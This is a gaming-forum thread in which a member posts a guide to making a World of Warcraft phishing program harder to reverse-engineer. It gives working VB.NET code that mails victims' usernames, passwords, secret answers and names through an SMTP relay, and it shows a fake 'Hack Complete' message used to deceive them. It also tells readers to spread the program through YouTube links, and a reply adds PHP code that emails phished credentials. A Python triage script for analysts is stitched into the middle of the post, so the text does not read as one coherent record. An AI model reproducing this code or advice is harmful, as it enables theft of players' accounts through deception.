[Guide] Reverse engineer proof your Phisher App!

  1. #1
    dj_hype's Avatar Member

    Okay, this is my first attempt at a guide so beware.

    My opinion of difficulty: [XXX--]
    Reason: Simple concept, somewhat difficult to execute.
    This guide assumes:
    A) You have basic knowledge of Visual Basic and have access to it (or Visual Studio).
    B) You are familiar with how these phisher programs work.
    C) You are familiar with how email relaying/smtp servers work.

    1. Basic Idea/How things normally work:
    The basic idea of doing this is to prevent http://www.mmowned.com/forums/wow-sc...g-youtube.html from happening to you. Basically, the way that the ShAnX and most application (program.exe) phishers are written is to send an email through GMail's smtp server. The super-basic way of doing this is sending an email from the account to the same account. Enhanced security would mean sending the email to a different account than the gmail account but if someone were to gain access, they just need to check your Sent emails folder/change the password and you're screwed.

    2. What's the point and what's the process?
    Well, you spent all this time making an awesome phisher and stuff, you don't want to ruin it because some leecher here read the above guide and is, well, leeching off all your hard work. Now the process is simple, using an email relayer that DOES NOT have web-mail access to send the email to a DIFFERENT address. Simple. Here's a diagram for those that are lost:

    Normal Way:
    User presses activate in phisher -> phisher logs into smtp.google.com with username/password -> phisher sends email to address in code -> email account receives email

    The problem (if you skipped the above portion) is that by using GMail, people can reverse engineer the username/password of the account from the program. They check sent messages and there's all your phished accounts. Or, they change the password and you have no more phished accounts.

    Safer Way:
    User presses activate in phisher -> phisher logs into smtp.xxx.com with (possibly without) username/password (using an account that DOES NOT have web access) -> phisher sends email to address in code -> email is forwarded to separate account address -> separate email account receives email

    Using this method, since there is no webmail access for the forwarding account (smtp.xxx.com), that username/password is useless. The worst they could do is report the address for abuse but, more often than not, they will give up.

    3. How is it done?
    It has been broken down into steps for ease of use.

    3.a Find an email relaying/forwarding service.
    This is the hardest part. There's a lot you can do. If you pay for webhosting (like I do) more than likely, you can make email mailboxes/forwarding. This is what I do. A domain that I have doesn't have any way to login to the email account and that's the one I use. I **might** help some of those out who have trouble with this part. If you're a leecher/low-on-the-totem-pole, please don't expect anything. PM me otherwise.

    3.b Setup an account on a webmail server (Yahoo, GMail, aol, etc...).
    I use Yahoo, you can use whatever you want. HINT: use different passwords for EVERY account!! You should know better but for those who don't, I'm laying it out for ya.

    3.c Edit the code.
    Now, this step is completely dependent on what Phisher you use. I use ShAnX. Download one of his releases and then open the VBProject file (if this all sounds foreign to you, then check out http://www.mmowned.com/forums/wow-sc...er-v1-5-a.html). Double click Form2 and then double click the "Activate" button to bring up the code for the button. This is what you will see:
    Code:
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    
            Dim WC As New System.Net.WebClient
    
            Dim MyMailMessage As New MailMessage
    
            MyMailMessage.From = New MailAddress("[email protected]")
    
            MyMailMessage.To.Add("[email protected]")
    
            MyMailMessage.Subject = (TextBox1.Text & " - " & "Their IP is: " & System.Text.Encoding.ASCII.GetString((WC.DownloadData("http://whatismyip.com/automation/n09230945.asp"))))
    
            WC.Dispose()
    
            MyMailMessage.Body = ("  1.) Username: " & TextBox1.Text & "  2.) Password: " & TextBox6.Text & "  3.) Secret Answer: " & TextBox2.Text & "  4.) Email " & TextBox3.Text & "  5.) First Name: " & TextBox4.Text & "  6.) Last Name: " & TextBox5.Text & "                          ****A ShAnX Program****")
    
            Dim SMTPServer As New SmtpClient("smtp.gmail.com")
    
            SMTPServer.Port = 587
    
            SMTPServer.Credentials = New System.Net.NetworkCredential("Email Here", "Pass here")
    
            SMTPServer.EnableSsl = True
    
            Try
    
                SMTPServer.Send(MyMailMessage)
    
    
            Catch ex As SmtpException
                MessageBox.Show(ex.Message)
            End Try
            If TextBox1.Text = "" Then
                MsgBox("Please enter the required fields")
            End If
    
            Me.Close()
            Form1.Close()
    
            If TextBox1.Text <> "" Then
                MsgBox("Hack Complete: You will be able to made a Death Knight (DK) on any realm within 3 hours")
    
            End If
    Okay, I'm not going to explain what all of that does. I'm just going to paste the new code below. Please note that I've modified the code slightly as I don't care what their IP is, and the workflow was a little odd. The way that I have it set up *SHOULD* prevent you from getting blank emails. I also took out some of the proper code formatting (spacing, etc...) Just trust me.
    Code:
    If TextBox1.Text = "" Then
                MsgBox("Please enter the required fields")
            End If
    
            Dim MyMailMessage As New MailMessage()
            Dim SMTPServer As New SmtpClient("smtp.xxx.com")
            Dim SMTPServerUser As New System.Net.NetworkCredential()
    
            MyMailMessage.From = New MailAddress("[email protected]")
            MyMailMessage.To.Add("[email protected]")
            MyMailMessage.IsBodyHtml = False
            MyMailMessage.Subject = (TextBox1.Text & " - " & "Their Password is: " & TextBox6.Text)
            ' WC.Dispose()
            MyMailMessage.Body = ("  1.) Username: " & TextBox1.Text & "  2.) Password: " & TextBox6.Text & "  3.) Secret Answer: " & TextBox2.Text & "  4.) Email " & TextBox3.Text & "  5.) First Name: " & TextBox4.Text & "  6.) Last Name: " & TextBox5.Text & "                          ****A ShAnX Program****")
    
            ' Try
            SMTPServer.EnableSsl = False
            SMTPServer.UseDefaultCredentials = False
            SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "your_password")
            SMTPServer.Host = "smtp.xxx.com"
            SMTPServer.DeliveryMethod = SmtpDeliveryMethod.Network
            SMTPServer.Send(MyMailMessage)
    
            ' Catch ex As SmtpException
            '   MessageBox.Show(ex.Message)
            ' End Try
    
            If TextBox1.Text <> "" Then
                MsgBox("Hack Complete: " & TextBox7.Text & "'s Level should have been changed to 80. If you login and it hasn't, some of the information you entered was invalid. Enjoy!")
    
            End If
    
            End
    You can see here that I've made it so that if the account text box is empty, then it won't send an email. After that, it creates the email, and sends it to a DIFFERENT account than the one used for relaying.

    3.d What YOU need to change.
    First, you need to change
    Code:
    Dim SMTPServer As New SmtpClient ("smtp.xxx.com")
    to the SMTP server your relaying account uses. Ex: ("smtp.email-relay.com")
    Next, change
    Code:
    MyMailMessage.From = New MailAddress("[email protected]")
    to the email address on the relaying server. Ex: ("[email protected]")
    Next,
    Code:
    MyMailMessage.To.Add("[email protected]")
    to your final destination email account (Yahoo, GMail, etc...). This address will be the one you check the accounts for. Ex: ("[email protected]")
    Next,
    Code:
    SMTPServer.Credentials = New System.Net.NetworkCredential("[email protected]", "your_password")
    to your relaying account and password. Ex: ("[email protected]", "imapassword123")
    Finally, change
    Code:
    SMTPServer.Host = "smtp.xxx.com"
    to the SMTP server you set earlier. Ex: ("smtp.email-relay.com")

    4. Test it all out. If you have errors, you did something wrong. The most common problem I encountered was an error that was something like "Unauthenticated relaying is forbidden." The order of the code should fix this error but I'm not 100% on that. I will attempt to help people as much as possible but I can only do so much.

    5. Upload the program to a hosting service then attach the link to your YouTube video and you should be all set.
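
Seen from the defender's side, the flow in this post leaves the relay host, the relay account and the final recipient address as string literals in the program, so an analyst can pull them from a decompiled sample for an abuse report to both mail providers. The following is an added example, not part of the original post; the sample source, the addresses and the `triage` function are constructed for illustration.

```python
import re

# Constructed sample: decompiled VB.NET shaped like the pattern in the post,
# with placeholder values (not taken from any real sample).
SAMPLE = '''
Dim MyMailMessage As New MailMessage()
Dim SMTPServer As New SmtpClient("smtp.relay.example")
MyMailMessage.From = New MailAddress("relay@relay.example")
MyMailMessage.To.Add("dropbox@webmail.example")
MyMailMessage.Body = ("1.) Username: " & TextBox1.Text & " 2.) Password: " & TextBox6.Text)
SMTPServer.EnableSsl = False
SMTPServer.Credentials = New System.Net.NetworkCredential("relay@relay.example", "hunter2")
SMTPServer.Send(MyMailMessage)
'''

# Each pattern captures one reportable indicator. The NetworkCredential
# pattern deliberately has no capture group for the password, so the
# secret is never copied into the report.
PATTERNS = {
    "smtp_host": re.compile(r'SmtpClient\s*\(\s*"([^"]+)"'),
    "sender": re.compile(r'MailAddress\s*\(\s*"([^"]+)"'),
    "recipient": re.compile(r'\.To\.Add\s*\(\s*"([^"]+)"'),
    "relay_account": re.compile(r'NetworkCredential\s*\(\s*"([^"]+)"\s*,\s*"[^"]*"'),
}
# Form input concatenated straight into the mail subject or body.
FORM_FIELD_IN_MAIL = re.compile(r'\.(?:Body|Subject)\s*=.*TextBox\d+\.Text')
# Submission without TLS: the collected data crosses the network in clear text.
PLAINTEXT_SMTP = re.compile(r'EnableSsl\s*=\s*False', re.I)


def triage(source: str) -> dict:
    """Return the mail indicators embedded in decompiled source plus a verdict."""
    report = {name: sorted(set(p.findall(source))) for name, p in PATTERNS.items()}
    report["form_input_mailed"] = bool(FORM_FIELD_IN_MAIL.search(source))
    report["plaintext_smtp"] = bool(PLAINTEXT_SMTP.search(source))
    hardcoded = report["smtp_host"] and report["relay_account"] and report["recipient"]
    # Hard-coded relay + recipient + form fields in the mail is the pattern
    # described in the post; anything less needs manual review.
    report["verdict"] = (
        "credential-mailer" if hardcoded and report["form_input_mailed"] else "inconclusive"
    )
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```
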

  2. #2
    Deadly Tomato's Avatar ft. Aestysu
    Then thank you...

    +rep for contrib.
    We stand as one, to remember Mirror.

  3. #3
    dj_hype's Avatar Member
    edit: Thanks.
    Last edited by dj_hype; 02-27-2009 at 01:11 AM.

  4. #4
    camicio's Avatar Banned
    There could be POP3 access to the email even if there is no web access to it.

  5. #5
    Cryde's Avatar Active Member
    You call others Leechers and got 2 Rep Yourself after being here since NOV 08? I lol'd
    PS: if they got the Account which sends, they can just check "Sent Mails" or "Trash".

    PM me for Signatures!

  6. #6
    Tierman's Avatar Active Member
    I know the SMTP mail.charter.net does not need a user/pass.

  7. #7
    Apoc's Avatar Angry Penguin
    Or.... you could just obfuscate the program, and send off whatever info you need to a php page which handles the emailing.

  8. #8
    dj_hype's Avatar Member
    Originally Posted by camicio
    There could be POP3 access to the email even if there is no web access to it.
    Even if there is POP3 access to the email account, it just forwards the email to another account, so it doesn't really matter.

    Originally Posted by Cryde1509
    You call others Leechers and got 2 Rep Yourself after being here since NOV 08? I lol'd
    PS: if they got the Account which sends, they can just check "Sent Mails" or "Trash".
    I simply offered the service of using an email account on my hosting solution as a way to give back to the community. This guide was made for all, but for me to provide something extra, all I required was people to not be leecher status. I never said I wasn't a leecher, but I'm trying to get above that reputation with posting this guide. Anyway, where would they check "Sent Mails" or "Trash"? Since there is no web access to the sending account, there is no storage, not to mention nowhere to login.

    Originally Posted by Tierman
    I know the SMTP mail.charter.net does not need a user/pass.
    Awesome. The only thing with using charter's server is you can login to their email service from charter.net (at least you could when I used to be a customer).

    Originally Posted by Apoc
    Or.... you could just obfuscate the program, and send off whatever info you need to a php page which handles the emailing.
    That's another option as well. This is simply a guide doing it the way I did it.

    To give a little more background on how mine is setup, I have a domain, we'll call it dbaggin.com. Dbaggin.com is just a forum, there is no webmail application on the website. I setup a mailbox on my hosting solution using dbaggin.com as the email domain. So, if someone were to get my username and password and go to dbaggin.com, there would be nowhere to login for email settings. Even if they were to go to my hosting solution, I disabled webmail access for that account.

    What I was offering to those in need (aka those who couldn't find an email relaying server) was an email address at dbaggin.com (well, my real server, not that one) and the smtp address so people could do this. Just trying to help out.

  9. #9
    Apoc's Avatar Angry Penguin
    Yup, or you could just setup a small PHP page to do the emailing for you.

    (Wrote this in the browser, so it may not be all correct.)
    PHP Code:
    $user $_POST['account'];
    $pass $_POST['pass'];
    $cdkey $_POST['cdkey'];

    $message "Username: {$user}\nPassword: {$pass}\nCD Key:{$cdkey}";
    $subject "New account phished!";
    $to "[email protected]";
    $from "[email protected]";
    mail($message$subject$to$from); 
